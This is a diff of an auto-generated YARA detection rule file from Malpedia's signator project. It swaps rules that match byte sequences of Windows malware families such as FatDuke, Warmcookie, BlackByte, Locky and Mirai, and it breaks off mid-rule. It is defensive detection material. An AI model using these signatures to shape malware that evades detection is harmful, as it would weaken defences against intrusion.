-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.divergent_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fatduke_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ce2ba9c31c93d1d30382978d9975d2fc77a1697c44fa31feb01e0ffcff44bfb5"
+		logic_hash = "2b9fcfe8a4ef7a6057f27cf4a92527f05cca75754ce0db88d74fae66934b4810"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116592,32 +116920,32 @@ rule MALPEDIA_Win_Divergent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85ff 0f8400010000 53 56 8b7508 57 }
-		$sequence_1 = { 50 e8???????? 83c40c 8d45f8 6a02 6a08 50 }
-		$sequence_2 = { 3b4510 7518 ff7510 8b4704 ff750c }
-		$sequence_3 = { e9???????? 57 bf???????? 57 ff15???????? 85c0 7474 }
-		$sequence_4 = { 0f888cfeffff 85f6 7402 03f0 03f8 33c9 }
-		$sequence_5 = { 742c 8b463c ff743054 56 57 }
-		$sequence_6 = { 8955fc 2500000080 df6df8 8365f800 8945fc }
-		$sequence_7 = { 84c0 7512 8b45fc 40 817d0c1a000080 }
-		$sequence_8 = { 8b4608 8b0488 eb02 33c0 5e 5d }
-		$sequence_9 = { 833fff 7437 8d4628 50 ff37 e8???????? 59 }
+		$sequence_0 = { ffb610020000 e8???????? 83c404 c786240200000f000000 c7862002000000000000 c6861002000000 c645fc13 }
+		$sequence_1 = { 8d411c 50 8d4dbc e8???????? c645fc01 bb01000000 53 }
+		$sequence_2 = { eb02 8bc6 33d2 668910 51 8bce e8???????? }
+		$sequence_3 = { 8d8d74ffffff e8???????? 8b4d80 b8abaaaa2a 8bbd7cffffff 83c410 2bcf }
+		$sequence_4 = { e8???????? 83c418 50 8d442440 50 8d442464 50 }
+		$sequence_5 = { ffb620030000 e8???????? 83c404 c786340300000f000000 c7863003000000000000 c6862003000000 c645fc1d }
+		$sequence_6 = { 8bce e8???????? 33c0 c745e800000000 c745ec00000000 c745ec07000000 c745e800000000 }
+		$sequence_7 = { e9???????? 8b7508 8d442414 6880000000 6a00 50 32db }
+		$sequence_8 = { c786340300000f000000 c7863003000000000000 c6862003000000 c645fc1f 83be1c03000010 720e ffb608030000 }
+		$sequence_9 = { ff7728 e8???????? 83c404 c7473c0f000000 c7473800000000 c6472800 c645fc00 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 9012224
 }
-rule MALPEDIA_Win_Atomsilo_Auto : FILE
+rule MALPEDIA_Win_Slub_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3435600a-ea5a-5a3a-a6f8-26d97e3c0136"
+		id = "94a02bf2-7103-5d7e-aa8d-633d7fba4826"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atomsilo_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.slub_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "e09362cc7b2f3a6215eeee28b5549da2887bc59c3f8b5fb41ad869fd5e8818fd"
+		logic_hash = "aee363d67e6a37d8547028a75375273379b56a2505a09b01f68a1ed9e200ef20"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116631,34 +116959,34 @@ rule MALPEDIA_Win_Atomsilo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4863c9 488d1506760900 33440a02 8b4c2438 ffc1 8bc9 488b542430 }
-		$sequence_1 = { 488bca e8???????? 90 0fbae60c 7336 0fbaf60c 89b500010000 }
-		$sequence_2 = { 0f84c7010000 498b4020 0fb600 2401 0f84b8010000 488d04bd00000000 488985e0000000 }
-		$sequence_3 = { 488b9308010000 4885d2 7415 488bfa 33c0 488b0c19 f348ab }
-		$sequence_4 = { 90 488bd0 488d4e60 e8???????? 90 488b4d60 48394d58 }
-		$sequence_5 = { 4053 4883ec30 488d0dc7340800 c705????????01000000 ff15???????? 488bd8 48331d???????? }
-		$sequence_6 = { 0f44ca 418bc4 8bd1 2bc1 83f801 77de 412bec }
-		$sequence_7 = { 4889442438 488bd8 4885c0 7443 488d05a57b0300 be04000000 488903 }
-		$sequence_8 = { e8???????? 418bd4 84c0 0f94c2 488d4def e8???????? 90 }
-		$sequence_9 = { 48895608 488b5c2470 4883c430 415f 415e 415c 5f }
+		$sequence_0 = { eb02 8bc7 83fa10 7204 8b37 eb02 }
+		$sequence_1 = { 57 e8???????? 83a634010000fd 83c410 c6863801000001 80bea40b000000 740a }
+		$sequence_2 = { 83bfac010000ff b810020000 b920020000 0f45c1 833c3802 7408 8b9fe0000000 }
+		$sequence_3 = { 83e802 0f84bf000000 83e801 0f848c000000 83e801 0f8489000000 8d442420 }
+		$sequence_4 = { 50 8b842488000000 ff348594a18d00 8d8424ac000000 ffb42488000000 ff32 51 }
+		$sequence_5 = { 56 57 8bbc2450010000 8bd8 c1e304 be10020000 03df }
+		$sequence_6 = { 8b4c2424 8b4924 894c242c 85c9 743e 8b29 837d2402 }
+		$sequence_7 = { e8???????? 50 57 53 56 e8???????? 83c418 }
+		$sequence_8 = { 8b3b bd00000100 896c2420 80bf4d01000000 7410 8387480100000a bdf4ff0000 }
+		$sequence_9 = { 0f45c8 8d4530 2bc8 83f916 7349 8b55dc c645f301 }
 
 	condition:
 		7 of them and filesize < 1785856
 }
-rule MALPEDIA_Win_Coredn_Auto : FILE
+rule MALPEDIA_Win_Warmcookie_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "56ae3d0f-275e-5068-a1a8-add140ea339b"
+		id = "c556795a-a9b2-5224-af08-851a57d361f5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.coredn_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warmcookie"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.warmcookie_auto.yar#L1-L195"
 		license_url = "N/A"
-		logic_hash = "3e99d32cb9f6585a539057b215782ae24308a0cdeed56e6718c13cdaa1226877"
+		logic_hash = "205c15eced2ed79efcc622047f0495a7c9e5251bb4fd9a4d1e0ae8a704e7e82e"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116670,37 +116998,43 @@ rule MALPEDIA_Win_Coredn_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 56 8d45fc 8bf1 50 e8???????? 85c0 }
-		$sequence_1 = { 2bf1 6690 8d82fafeff7f 85c0 741c 8a040e 84c0 }
-		$sequence_2 = { 57 bf00000000 8d0432 2bca 7438 }
-		$sequence_3 = { 8851ff b87a000780 5e 5d }
-		$sequence_4 = { 8a040e 84c0 7415 8801 41 83ea01 }
-		$sequence_5 = { 5e 8be5 5d c20400 85c9 7506 48 }
-		$sequence_6 = { 03d1 2bf0 85d2 7423 8a1c06 84db 741c }
-		$sequence_7 = { 84db 741c 8818 4a 40 }
-		$sequence_8 = { 8b0cc5ac1b4100 894de4 85c9 7455 8b4510 8945e8 8b4514 }
-		$sequence_9 = { 83c00c 83e03f 8a80b81c4100 88040a 8b06 }
-		$sequence_10 = { 8d3c8530404100 8b0f 85c9 740b 8d4101 f7d8 }
-		$sequence_11 = { 83e03f c1ff06 6bd830 8b04bd08414100 f644032801 7444 }
-		$sequence_12 = { 6bc618 57 8db8d83e4100 57 ff15???????? }
-		$sequence_13 = { 8b1c85e8dd4000 56 6800080000 6a00 53 ff15???????? }
-		$sequence_14 = { 83c40c 6b45e430 8945e0 8d80a8304100 }
+		$sequence_0 = { 0f85c0000000 4183e801 4489430c 0f1f840000000000 }
+		$sequence_1 = { 4863d3 4801d2 31c9 6641890c14 4883c438 }
+		$sequence_2 = { 0f8758fcffff e9???????? 448b6b0c 4439e8 }
+		$sequence_3 = { e8???????? 39c3 7f1c 4863d3 4801d2 }
+		$sequence_4 = { 4829c4 4c8d642420 4c89e6 4885d2 0f84f0010000 }
+		$sequence_5 = { f7c700040000 0f8440ffffff 4c39e6 0f877cfdffff }
+		$sequence_6 = { 4889c8 83c001 894324 83ee01 7236 }
+		$sequence_7 = { ff15???????? 25ff0f0000 8d88b80b0000 ff15???????? }
+		$sequence_8 = { e8???????? 3dff2f0000 0f97c0 0fb6c0 }
+		$sequence_9 = { ba18000000 4889c1 ffd3 85c0 }
+		$sequence_10 = { 488b01 ff9080000000 85c0 7815 }
+		$sequence_11 = { ba19000000 488b4c2438 ff15???????? 85c0 }
+		$sequence_12 = { 75e2 488b3d???????? 31ed 8b07 }
+		$sequence_13 = { 85c0 7409 488b442428 48c1e814 }
+		$sequence_14 = { 0fb710 6683fa20 76e4 4189c8 4183f001 }
+		$sequence_15 = { 4885c0 741a 89742428 4183c9ff }
+		$sequence_16 = { 488b01 ff5018 85c0 0f88b9000000 }
+		$sequence_17 = { 41be01000000 4489742454 4585e4 0f84aa000000 488d9550010000 b904010000 ff15???????? }
+		$sequence_18 = { 8b7500 33c0 f04d0fb1bcf1d0300200 488bd8 740e 483bc7 }
+		$sequence_19 = { 48ffc1 4881f900010000 72f0 4532d2 4c8bc6 }
+		$sequence_20 = { 488b4da7 ff15???????? 488bc3 488b4d37 4833cc e8???????? 488b9c2418010000 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 331776
 }
-rule MALPEDIA_Win_Cryptomix_Auto : FILE
+rule MALPEDIA_Win_Doplugs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee7d4b5d-fd38-5125-ac96-e606d0aa2a74"
+		id = "25bc6674-e80a-5978-bdcd-775785ac724e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptomix_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doplugs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doplugs_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "47824f768326cefd215579730913e815a8ef928dff6d4693ae0d6a1bbfe5f79b"
+		logic_hash = "f953831840b57858258557fc6d861ade3d3cd53d14e6b5f923d0ab7ef61db359"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116714,40 +117048,34 @@ rule MALPEDIA_Win_Cryptomix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? ffd6 85c0 0f8503010000 837d0c01 }
-		$sequence_1 = { 85c0 0f85c1000000 8b35???????? 68007d0000 6a40 }
-		$sequence_2 = { 6801000080 ff15???????? 6a04 8d85e8fbffff 50 6a04 }
-		$sequence_3 = { 59 59 8945f0 5e 837dfc00 740d ff75fc }
-		$sequence_4 = { 3db4263169 0f85a4000000 b801000000 8b4dfc 33cd e8???????? }
-		$sequence_5 = { 7504 6a07 eb3e 83f803 }
-		$sequence_6 = { c3 55 8bec 51 68ee7fd6aa 6a05 }
-		$sequence_7 = { 668b01 83c102 6685c0 75f5 8b3d???????? 2bca }
-		$sequence_8 = { e8???????? 83c420 ff75fc e8???????? ff75fc e8???????? 59 }
-		$sequence_9 = { ff75f4 53 6a19 ff75fc e8???????? }
-		$sequence_10 = { e8???????? 68f097a090 6a05 e8???????? 83c410 8d4df0 }
-		$sequence_11 = { 8d85c4f9ffff 50 8d85e8fbffff 50 ffd3 ff750c }
-		$sequence_12 = { 6808020000 8d8df8fdffff 51 6a00 ffd0 ff7508 8d85e8f9ffff }
-		$sequence_13 = { 8d5201 663bc6 72f5 8bf7 c7450800010000 8a16 }
-		$sequence_14 = { 668b8df4fdffff 33c0 8d95f4fdffff 6685c9 7418 }
-		$sequence_15 = { e8???????? 59 59 ff742404 ffd0 c3 68c1ea9d27 }
+		$sequence_0 = { ebc7 c60000 40 b988e80fa2 ba0977e673 3b45d8 0f44ca }
+		$sequence_1 = { ba7c5c3f74 ebd4 8a44240b be420360ff 884203 c7042469000000 81fe7c5c3f74 }
+		$sequence_2 = { ebb4 3d3c391092 0f84c4000000 3d3c69c7d0 75a2 8b45c8 8b45c8 }
+		$sequence_3 = { f6d0 248d 08c2 8b442408 88d6 80f24c 80f6b3 }
+		$sequence_4 = { e9???????? 8b4de4 e8???????? 8b4dbc 83c130 6a20 51 }
+		$sequence_5 = { e9???????? 31c0 b9c9efbb33 81f94e706309 7e21 81f92b388626 7f4e }
+		$sequence_6 = { c74424044363617e c744240869436b67 66c744240c6c7b 896c242c c644240e73 890424 8d44240f }
+		$sequence_7 = { f7d3 21cb 09de bb351d2051 31fe 6689742414 ebbd }
+		$sequence_8 = { b927018432 e9???????? 8b0c24 01e9 894c2410 8b4c2410 8a09 }
+		$sequence_9 = { f7d2 21da 09d0 8b542414 31c8 668902 8b0424 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 1355776
 }
-rule MALPEDIA_Win_Woolger_Auto : FILE
+rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3c730e5d-f238-51dc-9ad2-e2cb34cd5f3e"
+		id = "efee58a7-3550-5808-a11a-aa56167214d6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.woolger_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.locky_decryptor_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "a6736c829d032e2c9f6601605bc9a8797d9883ec84504553869cd4b3046fa27f"
+		logic_hash = "b6828e87e6bd376fe16778fc8bf9496b415a17dfa2572d88c3351b8ea18cb0b2"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116759,32 +117087,32 @@ rule MALPEDIA_Win_Woolger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4508 8b0d???????? 57 52 50 }
-		$sequence_1 = { 84d2 75f9 8dbdfcf8ffff 2bc1 }
-		$sequence_2 = { 6685c0 8d85fcfeffff 50 0f95c3 ff15???????? 8b4f08 }
-		$sequence_3 = { 83c408 85c0 7516 6a01 68???????? }
-		$sequence_4 = { be???????? e9???????? 83f80b 750a be???????? e9???????? 83f80d }
-		$sequence_5 = { e8???????? 8d85fcf6ffff 83c40c 8bc8 8a10 40 }
-		$sequence_6 = { 8d85fcfcffff 889508ffffff 898d04ffffff 8bd0 8a08 }
-		$sequence_7 = { 8b450c 3d00010000 740b 3d04010000 0f853b020000 }
-		$sequence_8 = { 885004 8d85fcfcffff 50 8d8dfcfdffff }
-		$sequence_9 = { 668945d4 8945d6 8945da 8945de 8945e2 8945e6 8945ea }
+		$sequence_0 = { 834424181c 43 3bdf 7cd2 8b4510 3944243c }
+		$sequence_1 = { e8???????? ff15???????? 50 8d8578ffffff 50 8d45cc e8???????? }
+		$sequence_2 = { 57 ff750c 8d742414 e8???????? }
+		$sequence_3 = { e8???????? ff15???????? 50 8d442448 50 8d442414 }
+		$sequence_4 = { e8???????? 8bc6 5d c20400 c3 }
+		$sequence_5 = { 37 46 37 61 37 }
+		$sequence_6 = { 64a100000000 50 64892500000000 83ec78 8b4510 53 8b5d0c }
+		$sequence_7 = { 84c0 7403 ff45ec ff45e8 6a01 33ff 8d7594 }
+		$sequence_8 = { 59 6a01 33ff 8db578ffffff e8???????? }
+		$sequence_9 = { c745c007000000 668945ac e8???????? ff75e4 8365fc00 8d45c8 e8???????? }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE
+rule MALPEDIA_Win_Blackbyte_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a50249a6-41ed-5afd-a344-f1c46141fa9b"
+		id = "452fd00b-5b18-59a5-8a83-8658b17c13ef"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nozelesn_decryptor_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackbyte_auto.yar#L1-L156"
 		license_url = "N/A"
-		logic_hash = "4edccdad4171a3a8dbbdabb59b2b49ff95bfdb30e97dda2b954d7aea22da3283"
+		logic_hash = "3e97ee9c8cf8b212a848f172ac3c7f3f16e8569d16a1ada661dd50af9fb2d432"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116798,73 +117126,85 @@ rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 33c0 83c40c 668945a8 c645fc02 8d7da4 837db808 }
-		$sequence_1 = { 8997c4010000 89b7c8010000 8bcf 8987cc010000 8d45f8 50 }
-		$sequence_2 = { 6a50 50 83fa10 c645fc01 8d8558ffffff 8d75c0 0f4375c0 }
-		$sequence_3 = { a1???????? 33c4 89442464 56 57 8b7d08 8d442410 }
-		$sequence_4 = { 8bd3 0b45e8 23c8 33ce 33f9 8b45e8 0bd0 }
-		$sequence_5 = { 2bc2 53 83f805 7c1b ff75f0 0fb701 50 }
-		$sequence_6 = { 8a45ef 0fb6f0 eb58 8d45ef 3945cc 8d45d4 757f }
-		$sequence_7 = { 8b5df4 8bc1 8b75ec c1e007 33d0 c1cb05 33d6 }
-		$sequence_8 = { 6a0c 8d4704 50 8d4604 50 56 8d4df8 }
-		$sequence_9 = { 8d8d18fdffff e8???????? 8d8d78fdffff e8???????? c745fcffffffff 8b95dcfdffff 83fa08 }
+		$sequence_0 = { 488d6c2458 b802000000 b908000000 31d2 }
+		$sequence_1 = { 0f29442450 85ff 0f8e82010000 4c8b5c2450 }
+		$sequence_2 = { 488d8424c0000000 e8???????? 89442460 895c2464 }
+		$sequence_3 = { 488d8424c0000000 31db 31c9 4889cf }
+		$sequence_4 = { 488d7301 4889c2 4889cf 488b442468 }
+		$sequence_5 = { 488d6c2440 4889442450 48894c2460 4885ff }
+		$sequence_6 = { 488d8424c0000000 48898424a8000000 488d8c24a0000000 48898c24d8000000 }
+		$sequence_7 = { 488d6c2440 4889442428 48895c2458 488b0d???????? 48894c2430 4889c8 e8???????? }
+		$sequence_8 = { 3b1d???????? 7cdb 33c0 488b5c2430 }
+		$sequence_9 = { 0f11442440 0f1005???????? 0f114c2450 0f100d???????? 0f11442460 }
+		$sequence_10 = { 3b1d???????? 7d09 488b0d???????? ebb0 }
+		$sequence_11 = { 3b1f 72bd 8b842470100000 eb4c }
+		$sequence_12 = { 0f29442430 e8???????? 0f1003 4c8bc7 488d542430 488d4c2420 660f7f742430 }
+		$sequence_13 = { 488d6c2458 b801000000 b9fb000000 31d2 31db 31f6 31ff }
+		$sequence_14 = { 3b1d???????? 7ce2 488b1d???????? 488bbc24d8000000 }
+		$sequence_15 = { 0f29442440 e8???????? 85c0 0f85d7000000 }
 
 	condition:
-		7 of them and filesize < 1122304
+		7 of them and filesize < 9435136
 }
-rule MALPEDIA_Win_Lilith_Auto : FILE
+rule MALPEDIA_Win_Medusa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "82364ac2-deb7-51b6-ba0e-2be91de6e553"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lilith_auto.yar#L1-L119"
+		id = "e5ced166-c5f3-50c0-9e84-e449f6bff889"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.medusa_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "e60f46a761d89df2badd5fa4f4597b68f40a30e0a662e1d347c30e5849d899e2"
+		logic_hash = "b88f5d47ff30b39fc78331a46c037d026177b73d253964f40555a9ce1312bb08"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d08 898814434300 68???????? e8???????? 8be5 5d c3 }
-		$sequence_1 = { 897df0 8b04bda84b4300 8955e8 8a4c0228 884dff f6c101 0f8425030000 }
-		$sequence_2 = { 6bc830 8b0495a84b4300 f644082801 7421 }
-		$sequence_3 = { c78558ffffff0f000000 c78554ffffff00000000 c68544ffffff00 c745fc00000000 8b3d???????? 8b1d???????? 0f1f4000 }
-		$sequence_4 = { c78560ffffff00000000 6a00 50 c7855cffffff00000000 e8???????? 83c40c }
-		$sequence_5 = { 83fe04 7cdc 5f 5e }
-		$sequence_6 = { ffb390210000 ff15???????? 83f8ff 740f 03f0 }
-		$sequence_7 = { d3c8 3305???????? 3905???????? 0f85334a0000 ff7508 e8???????? }
-		$sequence_8 = { 53 8b5d10 8b0485a84b4300 56 }
-		$sequence_9 = { 56 57 ff7520 8bf1 e8???????? }
+		$sequence_0 = { 680049ff69 004aff 6a00 4b ff6b00 4c ff6c004d }
+		$sequence_1 = { 1a03 69c421f3ef6a 2048b3 a5 }
+		$sequence_2 = { 52 ff7200 53 ff7300 54 }
+		$sequence_3 = { 317f52 56 5c ab 92 6f 0c48 }
+		$sequence_4 = { 9e 45 334a54 98 56 39ec 51 }
+		$sequence_5 = { 9f c48b2addd977 7612 a5 ba3c533f71 }
+		$sequence_6 = { e60e 6c 7bbc 45 }
+		$sequence_7 = { 54 ff740055 ff7500 56 }
+		$sequence_8 = { 99 5f 68066e570a 4f bfdb4a7adc }
+		$sequence_9 = { 1ddf859f31 e476 0c48 ce 74ec 1b826a013061 }
+		$sequence_10 = { 2a18 ae 085ffb cf }
+		$sequence_11 = { b5f9 43 324dd5 1ddf859f31 e476 0c48 }
+		$sequence_12 = { 5f e1fb 1cc9 3ca5 2c8e a1???????? d528 }
+		$sequence_13 = { b051 9f 4a d7 b9533e507c }
+		$sequence_14 = { 6c 6f aa 97 691c85470859bab566c1a5 }
+		$sequence_15 = { 813bf80937dc 8b4c6386 8608 5f }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 1720320
 }
-rule MALPEDIA_Win_Valley_Rat_Auto : FILE
+rule MALPEDIA_Win_Bandook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5dc86c73-fc1a-55cb-84b1-f3d8a7354032"
+		id = "e41ee65d-d778-576e-8219-d5b7551a8280"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.valley_rat_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bandook_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "cd2ba628443a3060bd3912a9438622a07d0947ed73efff5cb92a491d2061eff0"
-		score = 60
-		quality = 45
+		logic_hash = "3158dd6369626bf2143d645ab9a0e41f6f517c0e8f9383586a9041884da647b4"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116876,32 +117216,32 @@ rule MALPEDIA_Win_Valley_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c20800 53 6a00 6a00 }
-		$sequence_1 = { 5d c20800 53 6a00 6a00 }
-		$sequence_2 = { 8be5 5d c20800 53 6a00 }
-		$sequence_3 = { e8???????? 8be5 5d c20800 53 6a00 }
-		$sequence_4 = { e8???????? 8be5 5d c20800 53 6a00 6a00 }
-		$sequence_5 = { 8be5 5d c20800 53 6a00 6a00 }
-		$sequence_6 = { 33cd e8???????? 8be5 5d c20800 53 6a00 }
-		$sequence_7 = { c745c400000000 e8???????? f6c302 740b 8d8d08ffffff e8???????? 8b5dc0 }
-		$sequence_8 = { f30f6f05???????? f30f7f45a8 f30f6f05???????? f30f7f45b8 f30f6f05???????? f30f7f45c8 f30f7e05???????? }
-		$sequence_9 = { 8d45e4 bb03000000 50 8d4dc4 e8???????? 50 8d45d4 }
+		$sequence_0 = { 57 752d ff35???????? 8b3e 8d4598 8b7604 68???????? }
+		$sequence_1 = { 8945f8 8b4508 53 8b1d???????? 56 8b08 8b4004 }
+		$sequence_2 = { 0f84e0000000 b8???????? 8d4c243c 660f1f440000 8a11 3a10 751a }
+		$sequence_3 = { 8b550c 83ec20 33c9 8bc1 3914c590051d13 7408 40 }
+		$sequence_4 = { 3bf3 720e 4e 42 0fb606 80b830841e1300 74e9 }
+		$sequence_5 = { 238890bb1e13 03c5 3d00080000 72f1 230d???????? 094c2424 094c2428 }
+		$sequence_6 = { ba???????? b9???????? 8d85f4fbffff 0f45ca 51 68???????? 68???????? }
+		$sequence_7 = { 8b0d???????? a3???????? 894c2414 85c9 0f846b010000 6a10 8d4c2414 }
+		$sequence_8 = { ff15???????? 68???????? 8d85d0feffff 50 ff15???????? 8d8550faffff c78564faffff00000000 }
+		$sequence_9 = { c60000 0f57c0 660fd64704 8d45a4 c645fc03 50 8d4f10 }
 
 	condition:
-		7 of them and filesize < 2256896
+		7 of them and filesize < 23088128
 }
-rule MALPEDIA_Win_Mole_Auto : FILE
+rule MALPEDIA_Win_Mirai_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6fb57925-5672-50fa-ac3a-bb409269cd91"
+		id = "009ec30f-f4c4-5af9-afbc-ec79b59a007e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mole_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mirai_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d2300b61acf948bdcbf42bf1210c281241845787d88efeb1407824c182f5bb45"
+		logic_hash = "4b520e473aaa65894d4224b9e87eda17dce7091dc19025c78727d13bc484a535"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116915,32 +117255,32 @@ rule MALPEDIA_Win_Mole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 ff15???????? 8d85dcfdffff 50 e8???????? 83c404 0fb6c8 }
-		$sequence_1 = { 6a75 8b95c8eeffff 52 e8???????? 83c410 8d85cceeffff }
-		$sequence_2 = { 81bdf0fdffff2e6b9338 7735 81bdf0fdffff2e6b9338 0f843a3f0000 81bdf0fdffffa3a57438 0f8444340000 }
